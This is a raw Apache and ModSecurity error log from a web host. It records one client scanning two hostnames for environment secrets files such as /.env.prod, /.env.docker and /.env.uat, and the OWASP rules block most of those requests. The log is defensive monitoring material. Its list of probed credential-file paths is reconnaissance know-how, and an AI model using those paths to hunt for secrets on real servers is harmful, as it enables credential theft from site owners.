[Mon May 11 16:25:15.985669 2026] [security2:error] [pid 1412074:tid 1412076] [client 18.180.54.2:48254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.stage"] [unique_id "agHmyzJnyuKVXoStDha0JQAAAEA"]
[Mon May 11 16:25:16.568258 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:48264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.prod"] [unique_id "agHmzPy_GXSWIKeli0vx1wAAAIY"]
[Mon May 11 16:25:16.568493 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:48264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.prod"] [unique_id "agHmzPy_GXSWIKeli0vx1wAAAIY"]
[Mon May 11 16:25:16.568969 2026] [core:error] [pid 1411201:tid 1411252] [client 18.180.54.2:48264] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:16.569175 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:48264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.prod"] [unique_id "agHmzPy_GXSWIKeli0vx1wAAAIY"]
[Mon May 11 16:25:16.723949 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:48272] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.ci"] [unique_id "agHmzDJnyuKVXoStDha0JgAAAEs"]
[Mon May 11 16:25:16.724188 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:48272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.ci"] [unique_id "agHmzDJnyuKVXoStDha0JgAAAEs"]
[Mon May 11 16:25:16.724668 2026] [core:error] [pid 1412074:tid 1412087] [client 18.180.54.2:48272] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:16.724840 2026] [security2:error] [pid 1412074:tid 1412087] [client 18.180.54.2:48272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.ci"] [unique_id "agHmzDJnyuKVXoStDha0JgAAAEs"]
[Mon May 11 16:25:16.803773 2026] [autoindex:error] [pid 1416109:tid 1416145] [client 3.249.111.251:34168] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 16:25:17.291082 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:48284] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.stage"] [unique_id "agHmzfy_GXSWIKeli0vx2AAAAIc"]
[Mon May 11 16:25:17.291333 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:48284] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.stage"] [unique_id "agHmzfy_GXSWIKeli0vx2AAAAIc"]
[Mon May 11 16:25:17.291808 2026] [core:error] [pid 1411201:tid 1411253] [client 18.180.54.2:48284] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:17.292372 2026] [security2:error] [pid 1411201:tid 1411253] [client 18.180.54.2:48284] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.stage"] [unique_id "agHmzfy_GXSWIKeli0vx2AAAAIc"]
[Mon May 11 16:25:17.402761 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:48290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.docker"] [unique_id "agHmzVV4kyjgo4bQBUhTzwAAAMU"]
[Mon May 11 16:25:17.402983 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:48290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.docker"] [unique_id "agHmzVV4kyjgo4bQBUhTzwAAAMU"]
[Mon May 11 16:25:17.403521 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:48290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:17.403694 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:48290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.docker"] [unique_id "agHmzVV4kyjgo4bQBUhTzwAAAMU"]
[Mon May 11 16:25:17.990784 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:48296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.ci"] [unique_id "agHmzUWKUxpmnkK7zHx7ewAAARI"]
[Mon May 11 16:25:17.991005 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:48296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.ci"] [unique_id "agHmzUWKUxpmnkK7zHx7ewAAARI"]
[Mon May 11 16:25:17.991494 2026] [core:error] [pid 1411055:tid 1411075] [client 18.180.54.2:48296] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:17.996849 2026] [security2:error] [pid 1411055:tid 1411075] [client 18.180.54.2:48296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.ci"] [unique_id "agHmzUWKUxpmnkK7zHx7ewAAARI"]
[Mon May 11 16:25:18.122223 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:48312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.live"] [unique_id "agHmzvy_GXSWIKeli0vx2QAAAJg"]
[Mon May 11 16:25:18.122459 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:48312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.live"] [unique_id "agHmzvy_GXSWIKeli0vx2QAAAJg"]
[Mon May 11 16:25:18.122929 2026] [core:error] [pid 1411201:tid 1411269] [client 18.180.54.2:48312] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:18.123379 2026] [security2:error] [pid 1411201:tid 1411269] [client 18.180.54.2:48312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.live"] [unique_id "agHmzvy_GXSWIKeli0vx2QAAAJg"]
[Mon May 11 16:25:18.679511 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:40552] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.docker"] [unique_id "agHmzvy_GXSWIKeli0vx2gAAAJE"]
[Mon May 11 16:25:18.679728 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:40552] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.docker"] [unique_id "agHmzvy_GXSWIKeli0vx2gAAAJE"]
[Mon May 11 16:25:18.680220 2026] [core:error] [pid 1411201:tid 1411263] [client 18.180.54.2:40552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:18.680634 2026] [security2:error] [pid 1411201:tid 1411263] [client 18.180.54.2:40552] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.docker"] [unique_id "agHmzvy_GXSWIKeli0vx2gAAAJE"]
[Mon May 11 16:25:18.864820 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:40568] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.preprod"] [unique_id "agHmzlV4kyjgo4bQBUhT0QAAAMo"]
[Mon May 11 16:25:18.865009 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:40568] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.preprod"] [unique_id "agHmzlV4kyjgo4bQBUhT0QAAAMo"]
[Mon May 11 16:25:18.865488 2026] [core:error] [pid 1416109:tid 1416140] [client 18.180.54.2:40568] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:18.865650 2026] [security2:error] [pid 1416109:tid 1416140] [client 18.180.54.2:40568] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.preprod"] [unique_id "agHmzlV4kyjgo4bQBUhT0QAAAMo"]
[Mon May 11 16:25:19.359250 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:40580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.live"] [unique_id "agHmzzJnyuKVXoStDha0KQAAAE4"]
[Mon May 11 16:25:19.359486 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:40580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.live"] [unique_id "agHmzzJnyuKVXoStDha0KQAAAE4"]
[Mon May 11 16:25:19.359959 2026] [core:error] [pid 1412074:tid 1412090] [client 18.180.54.2:40580] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:19.360131 2026] [security2:error] [pid 1412074:tid 1412090] [client 18.180.54.2:40580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.live"] [unique_id "agHmzzJnyuKVXoStDha0KQAAAE4"]
[Mon May 11 16:25:19.615325 2026] [security2:error] [pid 1411099:tid 1411292] [client 18.180.54.2:40588] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.uat"] [unique_id "agHmzw-Qm4vhlWBPlMi5igAAAAg"]
[Mon May 11 16:25:19.615541 2026] [security2:error] [pid 1411099:tid 1411292] [client 18.180.54.2:40588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/.env.uat"] [unique_id "agHmzw-Qm4vhlWBPlMi5igAAAAg"]
[Mon May 11 16:25:19.616015 2026] [core:error] [pid 1411099:tid 1411292] [client 18.180.54.2:40588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:19.616812 2026] [security2:error] [pid 1411099:tid 1411292] [client 18.180.54.2:40588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/.env.uat"] [unique_id "agHmzw-Qm4vhlWBPlMi5igAAAAg"]
[Mon May 11 16:25:20.038892 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:40596] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.preprod"] [unique_id "agHm0FV4kyjgo4bQBUhT1QAAAMs"]
[Mon May 11 16:25:20.039123 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:40596] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.preprod"] [unique_id "agHm0FV4kyjgo4bQBUhT1QAAAMs"]
[Mon May 11 16:25:20.039697 2026] [core:error] [pid 1416109:tid 1416141] [client 18.180.54.2:40596] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:25:20.039863 2026] [security2:error] [pid 1416109:tid 1416141] [client 18.180.54.2:40596] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/.env.preprod"] [unique_id "agHm0FV4kyjgo4bQBUhT1QAAAMs"]
[Mon May 11 16:25:20.323694 2026] [security2:error] [pid 1411055:tid 1411063] [client 18.180.54.2:40608] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/.env.dist"] [unique_id "agHm0EWKUxpmnkK7zHx7gQAAAQY"]
